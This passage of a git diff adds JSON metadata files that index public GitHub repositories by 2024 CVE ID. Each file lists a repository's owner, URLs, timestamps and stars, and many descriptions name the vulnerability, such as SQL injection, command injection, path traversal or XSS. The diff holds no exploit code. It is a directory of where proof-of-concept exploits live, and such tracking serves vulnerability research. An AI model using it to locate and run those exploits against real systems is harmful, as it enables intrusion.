Perl Poc", + "fork": false, + "created_at": "2024-11-28T06:13:42Z", + "updated_at": "2024-11-28T06:22:35Z", + "pushed_at": "2024-11-28T06:22:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1112.json b/2024/CVE-2024-1112.json new file mode 100644 index 0000000000..f42479b552 --- /dev/null +++ b/2024/CVE-2024-1112.json @@ -0,0 +1,33 @@ +[ + { + "id": 837931543, + "name": "CVE-2024-1112", + "full_name": "enessakircolak\/CVE-2024-1112", + "owner": { + "login": "enessakircolak", + "id": 69612461, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69612461?v=4", + "html_url": "https:\/\/github.com\/enessakircolak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/enessakircolak\/CVE-2024-1112", + "description": null, + "fork": false, + "created_at": "2024-08-04T13:26:46Z", + "updated_at": "2024-08-13T18:12:30Z", + "pushed_at": "2024-08-13T18:12:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11199.json b/2024/CVE-2024-11199.json new file mode 100644 index 0000000000..045b020a18 --- /dev/null +++ b/2024/CVE-2024-11199.json @@ -0,0 +1,33 @@ +[ + { + "id": 893229030, + "name": "CVE-2024-11199", + "full_name": "windz3r0day\/CVE-2024-11199", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11199", + "description": "CVE-2024-11199 poc exploit", + "fork": false, + "created_at": "2024-11-23T21:43:20Z", + "updated_at": "2024-11-23T21:52:42Z", + "pushed_at": "2024-11-23T21:44:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11201.json b/2024/CVE-2024-11201.json new file mode 100644 index 0000000000..e030eab4f6 --- /dev/null +++ b/2024/CVE-2024-11201.json @@ -0,0 +1,33 @@ +[ + { + "id": 892997604, + "name": "CVE-2024-11201", + "full_name": "NSQAQ\/CVE-2024-11201", + "owner": { + "login": "NSQAQ", + "id": 41403864, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41403864?v=4", + "html_url": "https:\/\/github.com\/NSQAQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NSQAQ\/CVE-2024-11201", + "description": "TEST", + "fork": false, + "created_at": "2024-11-23T09:00:58Z", + "updated_at": "2024-11-23T09:01:02Z", + "pushed_at": "2024-11-23T09:00:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11318.json b/2024/CVE-2024-11318.json new file mode 100644 index 0000000000..d7c24c0692 --- /dev/null +++ b/2024/CVE-2024-11318.json @@ -0,0 +1,40 @@ +[ + { + "id": 803988373, + "name": "CVE-2024-11318", + "full_name": "xthalach\/CVE-2024-11318", + "owner": { + "login": "xthalach", + "id": 73621025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73621025?v=4", + "html_url": "https:\/\/github.com\/xthalach", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xthalach\/CVE-2024-11318", + "description": "This repository details an IDOR vulnerability in AbsysNet 2.3.1, which allows a remote attacker to brute-force session IDs via the \/cgi-bin\/ocap\/ endpoint. Successful exploitation can compromise active user sessions, exposing authentication tokens in HTML. The attack is limited to active sessions and is terminated if the user logs out.", + "fork": false, + "created_at": "2024-05-21T18:35:35Z", + "updated_at": "2024-11-25T14:35:05Z", + "pushed_at": "2024-11-24T23:08:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "absysnet", + "authentication-bypass", + "cve-2024-11318", + "exploit", + "hijacking", + "idor-attack" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11381.json b/2024/CVE-2024-11381.json new file mode 100644 index 0000000000..e6bdae6137 --- /dev/null +++ b/2024/CVE-2024-11381.json @@ -0,0 +1,33 @@ +[ + { + "id": 892726115, + "name": "CVE-2024-11381", + "full_name": "windz3r0day\/CVE-2024-11381", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11381", + "description": "CVE-2024-11381 poc exploit ", + "fork": false, + "created_at": "2024-11-22T16:53:14Z", + "updated_at": "2024-11-22T17:22:38Z", + "pushed_at": "2024-11-22T16:54:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11387.json b/2024/CVE-2024-11387.json new file mode 100644 index 0000000000..f8495f86b2 --- /dev/null +++ b/2024/CVE-2024-11387.json @@ -0,0 +1,33 @@ +[ + { + "id": 893617166, + "name": "CVE-2024-11387", + "full_name": "windz3r0day\/CVE-2024-11387", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11387", + "description": "CVE-2024-11387 poc exploit", + "fork": false, + "created_at": "2024-11-24T22:14:03Z", + "updated_at": "2024-11-25T08:04:10Z", + "pushed_at": "2024-11-24T22:15:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11388.json b/2024/CVE-2024-11388.json new file mode 100644 index 0000000000..81da15ff8b --- /dev/null +++ b/2024/CVE-2024-11388.json @@ -0,0 +1,33 @@ +[ + { + "id": 892723947, + "name": "CVE-2024-11388", + "full_name": "windz3r0day\/CVE-2024-11388", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11388", + "description": "CVE-2024-11388 poc exploit ", + "fork": false, + "created_at": "2024-11-22T16:48:21Z", + "updated_at": "2024-11-22T17:22:12Z", + "pushed_at": "2024-11-22T16:49:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11412.json b/2024/CVE-2024-11412.json new file mode 100644 index 0000000000..7f6614a469 --- /dev/null +++ b/2024/CVE-2024-11412.json @@ -0,0 +1,33 @@ +[ + { + "id": 892724705, + "name": "CVE-2024-11412", + "full_name": "windz3r0day\/CVE-2024-11412", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11412", + "description": "CVE-2024-11412 poc exploit ", + "fork": false, + "created_at": "2024-11-22T16:50:08Z", + "updated_at": "2024-11-22T17:22:26Z", + "pushed_at": "2024-11-22T16:51:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11428.json b/2024/CVE-2024-11428.json new file mode 100644 index 0000000000..b630dd8f2d --- /dev/null +++ b/2024/CVE-2024-11428.json @@ -0,0 +1,33 @@ +[ + { + "id": 892725472, + "name": "CVE-2024-11428", + "full_name": "windz3r0day\/CVE-2024-11428", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11428", + "description": "CVE-2024-11428 poc exploit ", + "fork": false, + "created_at": "2024-11-22T16:51:47Z", + "updated_at": "2024-11-22T17:22:29Z", + "pushed_at": "2024-11-22T16:52:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11432.json b/2024/CVE-2024-11432.json new file mode 100644 index 0000000000..8d25ebcc56 --- /dev/null +++ b/2024/CVE-2024-11432.json @@ -0,0 +1,33 @@ +[ + { + "id": 892723142, + "name": "CVE-2024-11432", + "full_name": "windz3r0day\/CVE-2024-11432", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11432", + "description": "CVE-2024-11432 poc exploit ", + "fork": false, + "created_at": "2024-11-22T16:46:24Z", + "updated_at": "2024-11-22T17:22:05Z", + "pushed_at": "2024-11-22T16:47:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1207.json b/2024/CVE-2024-1207.json new file mode 100644 index 0000000000..1f9abf4417 --- /dev/null +++ b/2024/CVE-2024-1207.json @@ -0,0 +1,33 @@ +[ + { + "id": 869417848, + "name": "CVE-2024-1207", + "full_name": "sahar042\/CVE-2024-1207", + "owner": { + "login": "sahar042", + "id": 49879157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49879157?v=4", + "html_url": "https:\/\/github.com\/sahar042", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sahar042\/CVE-2024-1207", + "description": "The WP Booking Calendar plugin for WordPress is vulnerable to SQL Injection via the 'calendar_request_params[dates_ddmmyy_csv]' parameter in all versions up to, and including, 9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attac", + "fork": false, + "created_at": "2024-10-08T09:05:16Z", + "updated_at": "2024-10-08T09:16:33Z", + "pushed_at": "2024-10-08T09:08:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1208.json b/2024/CVE-2024-1208.json new file mode 100644 index 0000000000..1476b64fa7 --- /dev/null +++ b/2024/CVE-2024-1208.json @@ -0,0 +1,75 @@ +[ + { + "id": 753221507, + "name": "CVE-2024-1208-and-CVE-2024-1210", + "full_name": "karlemilnikka\/CVE-2024-1208-and-CVE-2024-1210", + "owner": { + "login": "karlemilnikka", + "id": 20514810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20514810?v=4", + "html_url": "https:\/\/github.com\/karlemilnikka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karlemilnikka\/CVE-2024-1208-and-CVE-2024-1210", + "description": "Sensitive Information Exposure via API in LearnDash.", + "fork": false, + "created_at": "2024-02-05T17:46:41Z", + "updated_at": "2024-03-04T17:31:59Z", + "pushed_at": "2024-02-05T17:58:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808264498, + "name": "CVE-2024-1208", + "full_name": "Cappricio-Securities\/CVE-2024-1208", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-1208", + "description": "LearnDash LMS < 4.10.3 - Sensitive Information Exposure", + "fork": false, + "created_at": "2024-05-30T17:55:45Z", + "updated_at": "2024-06-27T14:28:24Z", + "pushed_at": "2024-06-24T09:52:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-tool", + "bugbounty-tools", + "cve-2024-1208", + "cve-2024-1208-exploit", + "cve-2024-1208-poc", + "cve-2024-1208-scanner", + "learndash-lms", + "learndash-lms-4-10-3-exploit", + "sensitive-information-exposure" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1209.json b/2024/CVE-2024-1209.json new file mode 100644 index 0000000000..c4e43e2320 --- /dev/null +++ b/2024/CVE-2024-1209.json @@ -0,0 +1,33 @@ +[ + { + "id": 753219299, + "name": "CVE-2024-1209", + "full_name": "karlemilnikka\/CVE-2024-1209", + "owner": { + "login": "karlemilnikka", + "id": 20514810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20514810?v=4", + "html_url": "https:\/\/github.com\/karlemilnikka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karlemilnikka\/CVE-2024-1209", + "description": "Sensitive Information Exposure via assignments in LearnDash. ", + "fork": false, + "created_at": "2024-02-05T17:41:47Z", + "updated_at": "2024-04-02T03:25:31Z", + "pushed_at": "2024-02-05T17:56:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1212.json b/2024/CVE-2024-1212.json new file mode 100644 index 0000000000..286f55aca3 --- /dev/null +++ b/2024/CVE-2024-1212.json @@ -0,0 +1,64 @@ +[ + { + "id": 774632757, + "name": "CVE-2024-1212", + "full_name": "Chocapikk\/CVE-2024-1212", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-1212", + "description": "Unauthenticated Command Injection In Progress Kemp LoadMaster", + "fork": false, + "created_at": "2024-03-19T22:23:18Z", + "updated_at": "2024-11-25T14:43:04Z", + "pushed_at": "2024-03-19T22:25:21Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 852349830, + "name": "CVE-2024-1212", + "full_name": "nak000\/CVE-2024-1212", + "owner": { + "login": "nak000", + "id": 169058475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169058475?v=4", + "html_url": "https:\/\/github.com\/nak000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nak000\/CVE-2024-1212", + "description": null, + "fork": false, + "created_at": "2024-09-04T16:50:08Z", + "updated_at": "2024-09-04T16:50:08Z", + "pushed_at": "2024-09-04T12:35:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1269.json b/2024/CVE-2024-1269.json new file mode 100644 index 0000000000..b2f186c5d1 --- /dev/null +++ b/2024/CVE-2024-1269.json @@ -0,0 +1,33 @@ +[ + { + "id": 758902920, + "name": "CVE-2024-1269", + "full_name": "sajaljat\/CVE-2024-1269", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-1269", + "description": "(XSS)", + "fork": false, + "created_at": "2024-02-17T12:21:17Z", + "updated_at": "2024-02-17T12:21:18Z", + "pushed_at": "2024-02-17T12:21:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-12883.json b/2024/CVE-2024-12883.json new file mode 100644 index 0000000000..7c1728cbbf --- /dev/null +++ b/2024/CVE-2024-12883.json @@ -0,0 +1,33 @@ +[ + { + "id": 772273310, + "name": "cve-2024-12883", + "full_name": "mhtsec\/cve-2024-12883", + "owner": { + "login": "mhtsec", + "id": 83952182, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83952182?v=4", + "html_url": "https:\/\/github.com\/mhtsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhtsec\/cve-2024-12883", + "description": null, + "fork": false, + "created_at": "2024-03-14T21:40:40Z", + "updated_at": "2024-03-14T21:40:41Z", + "pushed_at": "2024-03-14T21:40:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1301.json b/2024/CVE-2024-1301.json new file mode 100644 index 0000000000..b11fdefa58 --- /dev/null +++ b/2024/CVE-2024-1301.json @@ -0,0 +1,33 @@ +[ + { + "id": 754535047, + "name": "CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection", + "full_name": "guillermogm4\/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection", + "owner": { + "login": "guillermogm4", + "id": 26895345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895345?v=4", + "html_url": "https:\/\/github.com\/guillermogm4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guillermogm4\/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection", + "description": "POC Badgermeter moni tool - CVE-2024-1301", + "fork": false, + "created_at": "2024-02-08T09:08:05Z", + "updated_at": "2024-03-06T17:58:31Z", + "pushed_at": "2024-02-08T09:50:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1302.json b/2024/CVE-2024-1302.json new file mode 100644 index 0000000000..4fcab233ad --- /dev/null +++ b/2024/CVE-2024-1302.json @@ -0,0 +1,33 @@ +[ + { + "id": 754542610, + "name": "CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure", + "full_name": "guillermogm4\/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure", + "owner": { + "login": "guillermogm4", + "id": 26895345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895345?v=4", + "html_url": "https:\/\/github.com\/guillermogm4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guillermogm4\/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure", + "description": "POC Badgermeter moni tool - CVE-2024-1302", + "fork": false, + "created_at": "2024-02-08T09:27:53Z", + "updated_at": "2024-03-06T17:58:22Z", + "pushed_at": "2024-02-08T09:55:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1303.json b/2024/CVE-2024-1303.json new file mode 100644 index 0000000000..e413a5547c --- /dev/null +++ b/2024/CVE-2024-1303.json @@ -0,0 +1,33 @@ +[ + { + "id": 754543116, + "name": "CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal", + "full_name": "guillermogm4\/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal", + "owner": { + "login": "guillermogm4", + "id": 26895345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895345?v=4", + "html_url": "https:\/\/github.com\/guillermogm4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guillermogm4\/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal", + "description": "POC Badgermeter moni tool - CVE-2024-1303", + "fork": false, + "created_at": "2024-02-08T09:29:14Z", + "updated_at": "2024-03-06T17:58:14Z", + "pushed_at": "2024-02-08T10:00:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1304.json b/2024/CVE-2024-1304.json new file mode 100644 index 0000000000..7850a5d6b3 --- /dev/null +++ b/2024/CVE-2024-1304.json @@ -0,0 +1,33 @@ +[ + { + "id": 754543376, + "name": "CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS", + "full_name": "guillermogm4\/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS", + "owner": { + "login": "guillermogm4", + "id": 26895345, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895345?v=4", + "html_url": "https:\/\/github.com\/guillermogm4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guillermogm4\/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS", + "description": "POC Badgermeter moni tool - CVE-2024-1304", + "fork": false, + "created_at": "2024-02-08T09:29:54Z", + "updated_at": "2024-03-06T17:56:15Z", + "pushed_at": "2024-02-08T10:03:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1346.json b/2024/CVE-2024-1346.json new file mode 100644 index 0000000000..81731133ed --- /dev/null +++ b/2024/CVE-2024-1346.json @@ -0,0 +1,33 @@ +[ + { + "id": 763037615, + "name": "CVE-2024-1346", + "full_name": "PeterGabaldon\/CVE-2024-1346", + "owner": { + "login": "PeterGabaldon", + "id": 34518201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34518201?v=4", + "html_url": "https:\/\/github.com\/PeterGabaldon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PeterGabaldon\/CVE-2024-1346", + "description": "Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to calculate the root password of the MySQL database used by LaborOfficeFree using two constants.", + "fork": false, + "created_at": "2024-02-25T11:51:03Z", + "updated_at": "2024-03-19T03:13:08Z", + "pushed_at": "2024-02-25T11:55:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1380.json b/2024/CVE-2024-1380.json new file mode 100644 index 0000000000..b886e4ddb0 --- /dev/null +++ b/2024/CVE-2024-1380.json @@ -0,0 +1,33 @@ +[ + { + "id": 863002188, + "name": "CVE-2024-1380", + "full_name": "RandomRobbieBF\/CVE-2024-1380", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-1380", + "description": "Relevanssi – A Better Search <= 4.22.0 - Missing Authorization to Unauthenticated Query Log Export", + "fork": false, + "created_at": "2024-09-25T14:49:00Z", + "updated_at": "2024-10-18T17:57:34Z", + "pushed_at": "2024-09-25T14:50:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1403.json b/2024/CVE-2024-1403.json new file mode 100644 index 0000000000..5859db73c6 --- /dev/null +++ b/2024/CVE-2024-1403.json @@ -0,0 +1,33 @@ +[ + { + "id": 768162174, + "name": "CVE-2024-1403", + "full_name": "horizon3ai\/CVE-2024-1403", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-1403", + "description": "Progress OpenEdge Authentication Bypass", + "fork": false, + "created_at": "2024-03-06T15:27:18Z", + "updated_at": "2024-11-21T14:01:53Z", + "pushed_at": "2024-03-06T15:31:56Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 15, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1441.json b/2024/CVE-2024-1441.json new file mode 100644 index 0000000000..da1d2a9f30 --- /dev/null +++ b/2024/CVE-2024-1441.json @@ -0,0 +1,33 @@ +[ + { + "id": 787252981, + "name": "CVE-2024-1441", + "full_name": "almkuznetsov\/CVE-2024-1441", + "owner": { + "login": "almkuznetsov", + "id": 96069812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96069812?v=4", + "html_url": "https:\/\/github.com\/almkuznetsov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/almkuznetsov\/CVE-2024-1441", + "description": null, + "fork": false, + "created_at": "2024-04-16T07:14:33Z", + "updated_at": "2024-04-25T09:15:04Z", + "pushed_at": "2024-04-25T09:15:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1512.json b/2024/CVE-2024-1512.json new file mode 100644 index 0000000000..e04291a5d8 --- /dev/null +++ b/2024/CVE-2024-1512.json @@ -0,0 +1,33 @@ +[ + { + "id": 765658440, + "name": "CVE-2024-1512", + "full_name": "rat-c\/CVE-2024-1512", + "owner": { + "login": "rat-c", + "id": 89196953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89196953?v=4", + "html_url": "https:\/\/github.com\/rat-c", + "user_view_type": "public" + }, + "html_url": 